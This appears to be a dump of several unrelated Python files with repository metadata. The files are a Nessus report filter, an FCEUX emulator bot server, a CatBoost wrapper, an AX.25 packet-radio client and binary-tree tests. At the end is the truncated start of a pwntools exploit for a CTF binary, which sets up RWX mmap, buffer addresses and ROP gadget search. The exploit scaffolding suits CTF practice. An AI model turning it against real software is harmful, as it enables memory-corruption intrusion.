print("<NessusClientData_v2>")
# Generate list of files and pass for processing
for file in glob.glob(args['path'] + "/" + args['file']):
# Process file if it is not empty
if os.path.getsize(file) > 0:
procFile(file)
# If output format is XML then close root element
if args['output'] == "xml":
print("</NessusClientData_v2>")
if(not args['debug'] and errorsexist): print("\nWARNING: Run with -d to see files that could not be processed", file=sys.stderr)
# Process file
def procFile(file):
global errorsexist
# Parse XML file
try:
doc=xml.dom.minidom.parse(file)
# Verify this is an Nmap output file
if doc.getElementsByTagName("NessusClientData_v2"):
# Compile regular expression
if not args['case_sensitive']:
regexp = re.compile(args['regex'], re.IGNORECASE)
else:
regexp = re.compile(args['regex'])
procDocument(doc,regexp)
else:
if args['debug']: print("WARNING: " + file + " is not a valid Nmap output file", file=sys.stderr)
errorsexist=True
except:
if args['debug']: print("WARNING: Unable to parse " + file, file=sys.stderr)
errorsexist=True
# Process document
def procDocument(doc,regexp):
# Extract hosts
hosts=doc.getElementsByTagName("ReportHost")
for host in hosts:
# Check for regular expression match
if regexp.search(host.toxml()):
# Get host tags
tags=host.getElementsByTagName("tag")
addr_ipv4=""
addr_mac=""
hostname=""
for tag in tags:
tagname=tag.getAttribute("name")
tagvalue=tag.firstChild.data
if tagname == "host-ip": addr_ipv4 = tagvalue
if tagname == "host-fqdn": hostname = tagvalue
# Output minimal XML
if args['output'] == "xml_min":
hostxml=host.toxml()
for m in regexp.finditer(hostxml):
idxStart = m.start(0)
idxStart = hostxml.rfind("<", 0, idxStart)
idxEnd = m.end(0)
print("")
print("Host-FQDN: " + hostname)
print("Host-Addr: " + addr_ipv4)
print("")
print(hostxml[idxStart:idxEnd])
# Output XML
elif args['output'] == "xml":
print(host.toxml())
# Output addresses
if args['output'] == "ipv4" and addr_ipv4 != "": print(addr_ipv4)
if args['output'] == "mac" and addr_mac != "": print(addr_mac)
if args['output'] == "mac+ipv4" and addr_ipv4 != "": print(addr_mac + "|" + addr_ipv4)
# Output port list
if args['output'] == "ports":
ssl_list = []
out_list = []
items=host.getElementsByTagName("ReportItem")
# Discover which ports have SSL/TLS
for item in items:
portid=item.getAttribute("port")
plugin=item.getAttribute("pluginName")
if plugin == "SSL / TLS Versions Supported":
if portid not in ssl_list:
ssl_list.append(portid)
# Get port details from ReportItem elements
for item in items:
portid=item.getAttribute("port")
name=item.getAttribute("svc_name")
if name == "www": name = "http"
tunnel=""
if portid in ssl_list:
tunnel="ssl"
if name == "http" and tunnel == "ssl":
name = "https"
# Regex must be found in portid or service name
if(regexp.search(portid) or regexp.search(name)):
if portid not in out_list:
print(addr_ipv4+"|"+portid+"|"+name+"|"+tunnel+"|open")
out_list.append(portid)
# Output script output
if args['output'] == "script":
items=host.getElementsByTagName("ReportItem")
for item in items:
portid=item.getAttribute("port")
scripts=item.getElementsByTagName("plugin_output")
for script in scripts:
if regexp.search(script.toxml()):
print("")
print("Host-FQDN: " + hostname + ":" + portid)
print("Host-Addr: " + addr_ipv4 + ":" + portid)
print(script.firstChild.data)
if __name__ == '__main__':
# Execute main method
main(args)
| 33.36875
| 179
| 0.617906
| 661
| 5,339
| 4.919818
| 0.299546
| 0.01845
| 0.02952
| 0.01845
| 0.230935
| 0.135301
| 0.067036
| 0.067036
| 0.030135
| 0
| 0
| 0.006184
| 0.242742
| 5,339
| 159
| 180
| 33.578616
| 0.79817
| 0.145533
| 0
| 0.161905
| 0
| 0
| 0.175965
| 0.009482
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0.057143
| 0
| 0.085714
| 0.180952
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee36deec1ce296c7314b585757c03cbcb17ed182
| 5,109
|
py
|
Python
|
pykitml/fceux.py
|
RainingComputers/pykitml
|
1c3e50cebcdb6c4da63979ef9a812b44d23a4857
|
[
"MIT"
] | 34
|
2020-03-06T07:53:43.000Z
|
2022-03-13T06:12:29.000Z
|
pykitml/fceux.py
|
RainingComputers/pykitml
|
1c3e50cebcdb6c4da63979ef9a812b44d23a4857
|
[
"MIT"
] | 6
|
2021-06-08T22:43:23.000Z
|
2022-03-08T13:57:33.000Z
|
pykitml/fceux.py
|
RainingComputers/pykitml
|
1c3e50cebcdb6c4da63979ef9a812b44d23a4857
|
[
"MIT"
] | 1
|
2020-11-30T21:20:32.000Z
|
2020-11-30T21:20:32.000Z
|
import warnings
import socket
class FCEUXServer:
'''
Server class for making NES bots. Uses FCEUX emulator.
Visit https://www.fceux.com for info. You will also need to
load client lua script in the emulator.
'''
def __init__(self, frame_func, quit_func=None, ip='localhost', port=1234):
'''
Parameters
----------
frame_func : function
This function will be called every frame. The function should
accept two argument, :code:`server` (reference to this class)
and :code:`frame` (number of frames executed).
quit_func : function
This function will be executed when the server disconnects from
the emulator
ip : str
IP address of the computer.
port : int
Port to listen to.
'''
# Eshtablish connection with client
self._serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._serversocket.bind((ip, port))
self._serversocket.listen(5)
self._clientsocket, self._address = self._serversocket.accept()
# This function will be called every frame
self._on_frame_func = frame_func
self._on_quit_func = quit_func
self._server_info = self.recv() + ' ' + str(self._address)
self.send('ACK')
@property
def info(self):
'''
Emulator info and lua version.
'''
return self._server_info
def send(self, msg):
'''
Send message to lua code running on the emulator.
Parameters
----------
msg : str
'''
if(not type(msg) is str):
self.quit()
raise TypeError('Arguments have to be string')
self._clientsocket.send(bytes(msg+'\n', 'utf-8'))
def recv(self):
'''
Receive message from lua code running on emulator.
Returns
-------
str
Received message from emulator.
'''
return self._clientsocket.recv(4096).decode('utf-8')
def init_frame(self):
'''
Signal server to prep for next frame and returns
frame count
Returns
-------
int
Frame count
'''
# Receive message from client
frame_str = self.recv()
if(len(frame_str) == 0):
self.quit('Client had quit')
frame = int(frame_str)
return frame
def start(self):
'''
Starts the server, waits for emulator to connect.
Calls :code:`frame_func` every frame after connection
has been established.
'''
try:
# Keep receiving messaged from FCEUX and acknowledge
while True:
frame = self.init_frame()
self._on_frame_func(self, frame)
except BrokenPipeError:
self.quit('Client has quit.')
except KeyboardInterrupt:
self.quit()
def frame_advance(self):
'''
Move to next frame, should be called at the end of
:code:`frame_func`.
'''
# Send back continue message
self.send('CONT')
def get_joypad(self):
'''
Returns
-------
str
Joypad button states.
'''
self.send('JOYPAD')
return self.recv()
def set_joypad(self, up=False, down=False, left=False,
right=False, A=False, B=False, start=False, select=False):
'''
Set joypad button states.
'''
self.send('SETJOYPAD')
joypad = str(up)+' '+str(down)+' '+str(left)+' '+str(right)\
+' '+str(A)+' '+str(B)+' '+str(start)+' '+str(select)
self.send(joypad)
def read_mem(self, addr, signed=False):
'''
Read memory address.
Parameters
----------
addr : int
The memory address to read
signed : bool
If :code:`True`, returns signed integer
Returns
-------
int
The byte at the address.
'''
self.send('MEM')
self.send(str(addr))
unsigned = int(self.recv())
if(signed):
return unsigned-256 if unsigned>127 else unsigned
else:
return unsigned
def reset(self):
'''
Resets the emulator, executes a power cycle.
'''
self.send('RES')
def quit(self, reason=''):
'''
Disconnect from emulator.
Parameters
----------
reason : str
Reason for quitting.
'''
if(self._on_quit_func is not None):
self._on_quit_func()
self._serversocket.close()
self._clientsocket.close()
print(reason)
print('Server has quit.')
exit()
if(__name__ == '__main__'):
def on_frame(server, frame):
print(frame)
print(server.get_joypad())
server.frame_advance()
server = FCEUXServer(on_frame)
print(server.info)
server.start()
| 26.609375
| 78
| 0.533372
| 558
| 5,109
| 4.767025
| 0.317204
| 0.02406
| 0.018045
| 0.020301
| 0.07406
| 0.041353
| 0.025564
| 0
| 0
| 0
| 0
| 0.005481
| 0.357213
| 5,109
| 191
| 79
| 26.748691
| 0.804507
| 0.326287
| 0
| 0.027027
| 0
| 0
| 0.04991
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.175676
| false
| 0
| 0.027027
| 0
| 0.297297
| 0.067568
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee38deebe1bb8166653f041ac6b217f4fdba49db
| 5,480
|
py
|
Python
|
gossipcat/dev/CAT.py
|
Ewen2015/GossipCat
|
6792c2ddee16515d9724583c9b57f332cff4b206
|
[
"Apache-2.0"
] | 2
|
2017-12-17T06:24:43.000Z
|
2018-01-17T08:27:52.000Z
|
gossipcat/dev/CAT.py
|
Ewen2015/GossipCat
|
6792c2ddee16515d9724583c9b57f332cff4b206
|
[
"Apache-2.0"
] | null | null | null |
gossipcat/dev/CAT.py
|
Ewen2015/GossipCat
|
6792c2ddee16515d9724583c9b57f332cff4b206
|
[
"Apache-2.0"
] | 1
|
2017-12-12T16:00:48.000Z
|
2017-12-12T16:00:48.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
author: Ewen Wang
email: wolfgangwong2012@gmail.com
license: Apache License 2.0
"""
import warnings
warnings.filterwarnings('ignore')
import random
random.seed(0)
import time
import json
import pandas as pd
import matplotlib.pyplot as plt
import catboost as cb
class CAT(object):
"""docstring for CAT"""
def __init__(self, data, indcol, target, features, features_cat, predicting=False, multi=0, balanced=0, gpu=0, seed=0):
super(CAT, self).__init__()
self.data = data
self.indcol = indcol
self.features = features
self.features_cat = features_cat
self.predicting = predicting
self.data[self.features_cat] = self.data[self.features_cat].fillna('NaN')
if self.predicting:
self.target = None
self.dtest = cb.Pool(data=self.data[self.features],
cat_features=self.features_cat)
else:
self.target = target
self.dtrain = cb.Pool(data=self.data[self.features],
label=self.data[self.target],
cat_features=self.features_cat)
self.multi = multi
self.balanced = balanced
self.gpu = gpu
self.seed = seed
self.params = {}
self.cvr = pd.DataFrame()
self.prediction = pd.DataFrame()
def algorithm(self, iterations=100, early_stopping_rounds=20, nfold=10, type='Classical', loss_function='Logloss', verbose=100, plot=False):
self.params['iterations'] = iterations
self.params['early_stopping_rounds'] = early_stopping_rounds
self.params['loss_function'] = loss_function
self.params['verbose'] = verbose
message = 'cross validation started and will stop if performace did not improve in {} rounds.'.format(early_stopping_rounds)
print(message)
self.cvr = cb.cv(dtrain=self.dtrain,
params=self.params,
nfold=nfold,
seed=self.seed,
type=type,
plot=plot)
self.n_rounds = self.cvr.shape[0]
message = 'cross validation done with number of rounds: {}.'.format(self.n_rounds)
print(message)
message = 'test {}: {:.3f}'.format(self.params['loss_function'], self.cvr.iloc[-1, 1])
print(message)
return self.n_rounds
def train(self, path_model=None):
try:
message = 'number of training rounds: %d.' % self.n_rounds
print(message)
except Exception as e:
message = 'no hpyter parameters assigned and default assigned.'
print(message)
self.algorithm()
print(json.dumps(self.params, indent=4))
self.bst = cb.CatBoostClassifier(iterations=self.n_rounds)
self.bst.fit(self.dtrain)
if path_model == None:
pass
else:
self.bst.save_model(path_model)
print('model saved in path: %s' % path_model)
self.prediction[self.indcol] = self.data[self.indcol]
self.prediction['prob'] = self.bst.predict_proba(self.dtrain)[:,1]
self.prediction['pred'] = self.bst.predict(self.dtrain)
message = 'prediction done.'
print(message)
return None
def predict(self, path_model, path_result=None):
self.bst = cb.CatBoostClassifier()
self.bst.load_model(path_model)
message = 'model loaded from path: {}'.format(path_model)
print(message)
self.prediction[self.indcol] = self.data[self.indcol]
self.prediction['prob'] = self.bst.predict_proba(self.dtest)[:,1]
self.prediction['pred'] = self.bst.predict(self.dtest)
message = 'prediction done.'
print(message)
if path_result == None:
pass
else:
self.prediction.to_csv(path_result, index=False)
message = 'results saved in path: %s' % path_result
print(message)
return None
def learning_curve(self, figsize=(10, 5)):
if len(self.cvr) == 0:
return 'no models trained, no learning curves.'
plt.figure(figsize=figsize)
plt.plot(self.cvr[self.cvr.columns[1]], label='test')
plt.plot(self.cvr[self.cvr.columns[3]], label='train')
plt.title('learning curve')
plt.xlabel('number of rounds')
plt.ylabel(self.params['loss_function'])
plt.legend(loc='lower right', title='dataset')
plt.grid()
plt.show()
return None
def report(self):
try:
from gossipcat.Report import Visual
except Exception as e:
print('[WARNING] Package GossipCat not installed.')
try:
from Report import Visual
except Exception as e:
return '[ERROR] Package Report not installed.'
test_target = self.data[self.target]
prob = self.prediction['prob']
plt.figure(figsize=(6, 5.5))
self.prediction['prob'].hist(bins=100)
plt.title('distribution of predictions')
vis = Visual(test_target=test_target, test_predprob=prob)
vis.combo()
self.df_cap = vis.df_cap
return None
| 33.82716
| 144
| 0.578102
| 633
| 5,480
| 4.913112
| 0.28594
| 0.028296
| 0.030868
| 0.025723
| 0.227653
| 0.137621
| 0.137621
| 0.07717
| 0.053376
| 0.053376
| 0
| 0.011114
| 0.310401
| 5,480
| 162
| 145
| 33.82716
| 0.811855
| 0.02792
| 0
| 0.243902
| 0
| 0
| 0.124012
| 0.003952
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0.01626
| 0.073171
| 0
| 0.186992
| 0.097561
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee39158935f040d9514500c148f834c9e0815920
| 4,698
|
py
|
Python
|
kiss.py
|
QuantumEF/AX25-Chat
|
d2f8f8b5b3a968c6982dd013c5860aab461e4dc6
|
[
"MIT"
] | null | null | null |
kiss.py
|
QuantumEF/AX25-Chat
|
d2f8f8b5b3a968c6982dd013c5860aab461e4dc6
|
[
"MIT"
] | null | null | null |
kiss.py
|
QuantumEF/AX25-Chat
|
d2f8f8b5b3a968c6982dd013c5860aab461e4dc6
|
[
"MIT"
] | 1
|
2020-09-16T03:19:18.000Z
|
2020-09-16T03:19:18.000Z
|
#!/usr/bin/python
import sys
import socket
import asyncio
import select
from hexdump import hexdump
KISS_FEND = 0xC0 # Frame start/end marker
KISS_FESC = 0xDB # Escape character
KISS_TFEND = 0xDC # If after an escape, means there was an 0xC0 in the source message
KISS_TFESC = 0xDD # If after an escape, means there was an 0xDB in the source message
class kiss_ax25:
def __init__(self, callsign, kiss_tcp_addr="127.0.0.1", kiss_tcp_port=8001):
self.callsign = callsign
self.kiss_addr = kiss_tcp_addr
self.kiss_port = kiss_tcp_port
self.src_addr = encode_address(callsign.upper(), True)
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((self.kiss_addr, self.kiss_port))
self.poller = select.poll()
self.poller.register(self.s, select.POLLIN)
def send(self, dest_call, message):
dest_addr = encode_address(dest_call.upper(), False)
c_byte = [0x03] # This is a UI frame
pid = [0xF0] # No protocol
msg = [ord(c) for c in message]
packet = dest_addr + self.src_addr + c_byte + pid + msg
# Escape the packet in case either KISS_FEND or KISS_FESC ended up in our stream
packet_escaped = []
for x in packet:
if x == KISS_FEND:
packet_escaped += [KISS_FESC, KISS_TFEND]
elif x == KISS_FESC:
packet_escaped += [KISS_FESC, KISS_TFESC]
else:
packet_escaped += [x]
# Build the frame that we will send to Dire Wolf and turn it into a string
kiss_cmd = 0x00 # Two nybbles combined - TNC 0, command 0 (send data)
kiss_frame = [KISS_FEND, kiss_cmd] + packet_escaped + [KISS_FEND]
output = bytearray(kiss_frame)
self.s.send(output)
def recv(self):
recv_data = []
message=''
msg_bit = False
fdVsEvent = self.poller.poll(500)
if fdVsEvent == []:
return "None", "None"
for descriptor, Event in fdVsEvent:
recv_byte = self.s.recv(1)
recv_byte = b'\x00'
while recv_byte != KISS_FEND:
recv_byte = ord(self.s.recv(1))
if recv_byte == 0xF0:
msg_bit = True
if msg_bit:
message+=chr(recv_byte)
recv_data.append(recv_byte)
source = decode_address(recv_data[1+7:8+7])
hexdump(''.join(message))
return source, ''.join(message)
def kill(self):
self.s.shutdown(socket.SHUT_RD)
#self.s.close()
def recv_kiss():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8001))
print("Recieving")
recv_data = []
recv_byte = s.recv(1)
while True:
recv_byte = s.recv(1)
print(recv_byte)
if recv_byte == b'\xc0':
#print("End of Transmission")
break
recv_data += recv_byte
s.close()
return recv_data
#Code below here slightly modified from https://thomask.sdf.org/blog/2018/12/15/sending-raw-ax25-python.html
def send_kiss(source_call, dest_call, message):
# Make a UI frame by concatenating the parts together
# This is just an array of ints representing bytes at this point
dest_addr = encode_address(dest_call.upper(), False)
src_addr = encode_address(source_call.upper(), True)
c_byte = [0x03] # This is a UI frame
pid = [0xF0] # No protocol
msg = [ord(c) for c in message]
packet = dest_addr + src_addr + c_byte + pid + msg
# Escape the packet in case either KISS_FEND or KISS_FESC ended up in our stream
packet_escaped = []
for x in packet:
if x == KISS_FEND:
packet_escaped += [KISS_FESC, KISS_TFEND]
elif x == KISS_FESC:
packet_escaped += [KISS_FESC, KISS_TFESC]
else:
packet_escaped += [x]
# Build the frame that we will send to Dire Wolf and turn it into a string
kiss_cmd = 0x00 # Two nybbles combined - TNC 0, command 0 (send data)
kiss_frame = [KISS_FEND, kiss_cmd] + packet_escaped + [KISS_FEND]
output = str(bytearray(kiss_frame))
#hexdump(bytearray(kiss_frame))
# Connect to Dire Wolf listening on port 8001 on this machine and send the frame
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8001))
s.send(output)
s.close()
# Addresses must be 6 bytes plus the SSID byte, each character shifted left by 1
# If it's the final address in the header, set the low bit to 1
# Ignoring command/response for simple example
def encode_address(s, final):
if "-" not in s:
s = s + "-0" # default to SSID 0
call, ssid = s.split('-')
if len(call) < 6:
call = call + " "*(6 - len(call)) # pad with spaces
encoded_call = [ord(x) << 1 for x in call[0:6]]
encoded_ssid = (int(ssid) << 1) | 0b01100000 | (0b00000001 if final else 0)
return encoded_call + [encoded_ssid]
def decode_address(s):
call = [chr(x>>1) for x in s[0:6]]
ssid = str( (s[6] >> 1) & 0b11001110)
#print(str(call)+":"+ssid)
return ''.join(call)+'-'+ssid
#send_kiss("kn4vhm","km4yhi","hi")
| 33.557143
| 108
| 0.686037
| 764
| 4,698
| 4.060209
| 0.269634
| 0.030948
| 0.032882
| 0.027079
| 0.401032
| 0.378788
| 0.378788
| 0.378788
| 0.3343
| 0.321083
| 0
| 0.036036
| 0.196679
| 4,698
| 140
| 109
| 33.557143
| 0.785904
| 0.278629
| 0
| 0.351852
| 0
| 0
| 0.017257
| 0
| 0
| 0
| 0.013091
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.046296
| 0
| 0.175926
| 0.018519
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee3cb7c19d0619f9abd1c5afe9d9065a4239aee4
| 7,451
|
py
|
Python
|
Tree_test.py
|
nelliesnoodles/PythonBinaryTree
|
a5964cbb991cbd5007a5253bd48bc83eb56dc0ca
|
[
"MIT"
] | null | null | null |
Tree_test.py
|
nelliesnoodles/PythonBinaryTree
|
a5964cbb991cbd5007a5253bd48bc83eb56dc0ca
|
[
"MIT"
] | null | null | null |
Tree_test.py
|
nelliesnoodles/PythonBinaryTree
|
a5964cbb991cbd5007a5253bd48bc83eb56dc0ca
|
[
"MIT"
] | null | null | null |
from random import randint
from BST_version_3 import BinaryTreeNode, BinaryTree
# I have to keep the build of lists under 3,000 total
# my computer starts to freak out about memory at 10,000
# it slows at 3000.
# recursion depth happens on count at 2000 items
def test_set():
oaktree = BinaryTree(50.5)
for i in range(0, 50):
oaktree.set(i, 'crunchy leaves')
assert oaktree._size == 50
for i in range(50, 100):
oaktree.set(i, 'acorns')
assert oaktree._size == 100
for i in range(0, 50):
oaktree.set(i, 'gypsy moths')
assert oaktree._size == 100
def test_count():
mapletree = BinaryTree(75.5)
for i in range(0, 100):
x = randint(1, 100)
mapletree.set(x, 'climbable')
assert mapletree._size == mapletree.count()
for i in range(0, 50):
x = randint(100, 150)
mapletree.set(x, 'shade')
assert mapletree._size == mapletree.count()
pinetree = BinaryTree(80.5)
for i in range(0, 160):
pinetree.set(i, 'christmas')
assert pinetree.count() == 160
pinetree.set(161, 'needles')
assert pinetree.count() == 161
def test_delete():
oaktree = BinaryTree(50.5)
for i in range(0, 50):
oaktree.set(i, 'crunchy leaves')
pinetree = BinaryTree(80.5)
for i in range(0, 160):
pinetree.set(i, 'christmas')
oaktree.delete(1)
assert oaktree.count() == 49
assert oaktree._size == 49
oaktree.delete(25)
assert oaktree.count() == 48
assert oaktree._size == 48
for i in range(0, 160):
pinetree.delete(i)
assert pinetree.count() == 0
assert pinetree._size == 0
for i in range(2, 25):
oaktree.delete(i)
assert oaktree.count() == 25
assert oaktree._size == 25
redwood = BinaryTree(11.5)
redlist = []
for i in range(0, 40):
x = randint(0, 40)
if x not in redlist:
redlist.append(x)
redwood.set(x, 'not 40')
assert redwood.count != 40
length_redlist = len(redlist)
assert redwood._size == length_redlist
for i in range(0, length_redlist):
redwood.delete(redlist[i])
assert redwood._size == 0
## was a FAIL...
## fixed. was removing the temp.left and temp.right
## only should remove the temp link that matched the (akey)
## that we want to delete.
assert redwood.count() == redwood._size
rightsided = BinaryTree(5.5)
righty = []
for i in range(0, 50):
rightsided.set(i, "slide to the right.")
righty.append(i)
assert len(righty) == rightsided._size
for i in range(0, 50):
rightsided.delete(i)
assert rightsided._size == 0
leftsided = BinaryTree(100.5)
lefty = []
for i in range(0, 50):
leftsided.set(i, "slide to the left")
lefty.append(i)
assert len(lefty) == leftsided._size
#### random leftsided rightsided
for i in range(0, 50):
x = randint(6, 50)
rightsided.set(x, "one hop this time")
righty2 = rightsided.make_key_list()
assert len(righty2) == rightsided._size
jump_jump = rightsided._size
for i in range(0, jump_jump):
x = righty2[i]
rightsided.delete(x)
assert rightsided._size == rightsided.count() == 0
for i in range(0, 50):
x = randint(0, 90)
leftsided.set(x, "cha-cha now ya'all.")
lefty2 = leftsided.make_key_list()
assert len(lefty2) == leftsided._size
cha_cha = leftsided._size
for i in range(0, cha_cha):
x = lefty2[i]
leftsided.delete(x)
assert leftsided._size == leftsided.count() == 0
### TEST A LARGE TREE ###
rainforest = BinaryTree(500.5)
for i in range(0, 1000):
x = randint(0, 1000)
rainforest.set(x, "oxygen")
rainy = rainforest.make_key_list()
assert len(rainy) == rainforest._size
cha_cha = rainforest._size
for i in range(0, cha_cha):
x = rainy[i]
rainforest.delete(x)
assert rainforest._size == rainforest.count() == 0
def test_make_list():
willow = BinaryTree(50.5)
messy_tree = []
### willow, lopsidded
for i in range(0, 50):
willow.set(i, "weeping")
messy_tree.append(i)
will_list = willow.make_key_list()
willow_size = willow.count()
assert len(will_list) == willow_size
for i in range(0, 50):
assert will_list[i] in messy_tree
## make_list_ appends from root.left, root.right down the branches
## the lists will have a different order, root.right will be second in the
## make_list, as it will most likely not be the second appended to manual list
for i in range(0, 50):
assert messy_tree[i] in will_list
## silver_spruce more even
silver_spruce = BinaryTree(40.5)
decor = []
for i in range(0, 82):
silver_spruce.set(i, 'firewood')
decor.append(i)
pine = silver_spruce.make_key_list()
spruce_count = silver_spruce.count()
assert len(pine) == spruce_count
for i in range(0, 82):
assert decor[i] in pine
for i in range(0, 82):
assert pine[i] in decor
### random made even tree
apple = BinaryTree(30.5)
pie = []
for i in range(0, 40):
x = randint(0, 62)
apple.set(x, "buggy")
pie.append(x)
juice = apple.make_key_list()
apple_size = apple.count()
assert apple_size == len(juice)
for i in range(0, apple_size):
assert juice[i] in pie
assert pie[i] in juice
def test_get():
oaktree = BinaryTree(-511.5)
oaklist = []
oaktree.set(-211, "spam1")
oaklist.append(-211)
oaktree.set(-739, "spam2")
oaklist.append(-739)
oaktree.set(-279, "spam3")
oaklist.append(-279)
oaktree.set(-417, "spam4")
oaklist.append(-417)
oaktree.set(-419, "spam5")
oaklist.append(-419)
oaktree.set(-969, "spam6")
oaklist.append(-969)
oaktree.set(-14, "spam7")
oaklist.append(-14)
oaktree.set(-715, "spam8")
oaklist.append(-715)
oaktree.set(-351, "spam9")
oaklist.append(-351)
oaktree.set(-349, "spam10")
oaklist.append(-349)
oaktree.set(-893, "spam11")
oaklist.append(-893)
oaktree.set(-672, "spam12")
oaklist.append(-672)
oaktree.set(-455, "spam13")
oaklist.append(-455)
oaktree.set(-21, "spam14")
oaklist.append(-21)
oaktree.set(-463, "spam15")
oaklist.append(-463)
######################
oaktree.set(-321, "spam16")
oaklist.append(-321)
oaktree.set(-6, "spam17")
oaklist.append(-6)
oaktree.set(-741, "spam18")
oaklist.append(-741)
oaktree.set(-494, "spam19")
oaklist.append(-494)
oaktree.set(-595, "spam20")
oaklist.append(-595)
oaktree.set(-452, "spam21")
oaklist.append(-452)
oaktree.set(-36, "spam22")
oaklist.append(-36)
oaktree.set(-358, "spam23")
oaklist.append(-358)
oaktree.set(-796, "spam24")
oaklist.append(-796)
oaktree.set(-625, "spam25")
oaklist.append(-625)
oaktree.set(-61, "spam26")
oaklist.append(-61)
oaktree.set(-329, "spam27")
oaklist.append(-329)
############################
oaktree.set(-35, "spam28")
oaklist.append(-35)
oaktree.set(-106, "spam29")
oaklist.append(-106)
oaktree.set(-393, "spam30")
oaklist.append(-393)
oaktree.set(-57, "spam31")
oaklist.append(-57)
oaktree.set(-314, "spam32")
oaklist.append(-314)
oaktree.set(-51, "spam33")
oaklist.append(-51)
oaktree.set(-62, "spam34")
oaklist.append(-62)
oaktree.set(-689, "spam35")
oaklist.append(-689)
oaktree.set(-366, "spam36")
oaklist.append(-366)
oaktree.set(-344, "spam37")
oaklist.append(-344)
oaktree.set(-463, "spam38")
oaklist.append(-463)
oaktree.set(-663, "spam39")
oaklist.append(-663)
oaktree.set(-318, "spam40")
oaklist.append(-318)
assert oaktree.get(-318) == "spam40"
assert oaktree.get(100) == None
assert oaktree.get(-393) == "spam30"
assert oaktree.get(-969) == "spam6"
assert oaktree.get(-6) =="spam17"
assert oaktree.get(-211) == "spam1"
assert oaktree.get(-279) == "spam3"
assert oaktree.get(-969) == "spam6"
for akey in oaklist:
assert oaktree.get(akey) != None
oaktree.delete(-211)
oaktree.delete(-739)
assert oaktree.get(-211) == None
assert oaktree.get(-739) == None
| 27.596296
| 80
| 0.68219
| 1,148
| 7,451
| 4.361498
| 0.212544
| 0.087877
| 0.034751
| 0.063711
| 0.196924
| 0.142201
| 0.12143
| 0.082485
| 0.069303
| 0.045936
| 0
| 0.087858
| 0.152194
| 7,451
| 269
| 81
| 27.698885
| 0.704765
| 0.086297
| 0
| 0.155738
| 0
| 0
| 0.067996
| 0
| 0
| 0
| 0
| 0
| 0.196721
| 1
| 0.020492
| false
| 0
| 0.008197
| 0
| 0.028689
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee407797b83ac396b3980aeaad4d8b956d5e4e23
| 4,026
|
py
|
Python
|
writeups/2020/CyberStakes/party-roppin/solve.py
|
welchbj/ctf
|
fd4e2cea692b134163cc9bd66c2b4796bdefed8c
|
[
"MIT"
] | 65
|
2019-10-07T01:29:16.000Z
|
2022-03-18T14:20:40.000Z
|
writeups/2020/CyberStakes/party-roppin/solve.py
|
welchbj/ctf
|
fd4e2cea692b134163cc9bd66c2b4796bdefed8c
|
[
"MIT"
] | null | null | null |
writeups/2020/CyberStakes/party-roppin/solve.py
|
welchbj/ctf
|
fd4e2cea692b134163cc9bd66c2b4796bdefed8c
|
[
"MIT"
] | 12
|
2020-05-04T01:16:53.000Z
|
2022-01-02T14:33:41.000Z
|
#!/usr/bin/env python2
"""
Run exploit locally with:
./solve.py
./solve.py REMOTE HOST=challenge.acictf.com PORT=45110
"""
import ast
import struct
import subprocess
from pwn import *
PROG_PATH = './challenge'
PROT_RWX = constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC
EGG_SIZE = 0x1000
def init_pwntools_context():
context.binary = PROG_PATH
context.terminal = ['tmux', 'vsplit', '-h']
context.log_level = 'debug'
def init_io():
if args['REMOTE']:
return remote(args['HOST'], int(args['PORT']))
else:
pty = process.PTY
return process(PROG_PATH, stdin=pty, stdout=pty, stderr=pty)
def check_out(io, shelf_idx, backpack_idx):
io.sendlineafter('\n\n', '2')
io.sendlineafter('book in?\n', str(shelf_idx))
io.sendlineafter('put the book?\n', str(backpack_idx))
def leave(io):
io.sendlineafter('\n\n', '9')
def fill_choice_buffer(io, data):
assert '\n' not in data
io.sendlineafter('\n\n', '1')
io.sendlineafter('\n\n', '0')
io.sendlineafter('Title?\n', data)
class Addrs:
CHOICE_BUF = 0x603100
MMAP = 0x4008e0
READ = 0x400930
def write_binary(io):
size = io.recvn(4)
size = struct.unpack('>I', size)[0]
log.info('Receiving ELF of size ' + str(size))
elf = io.recvn(size)
with open('challenge', 'w') as f:
f.write(elf)
def get_gadget(ropper_out, target, bad_str='0a'):
for line in ropper_out.splitlines():
line = line.strip()
if not line or not line.startswith('0x'):
continue
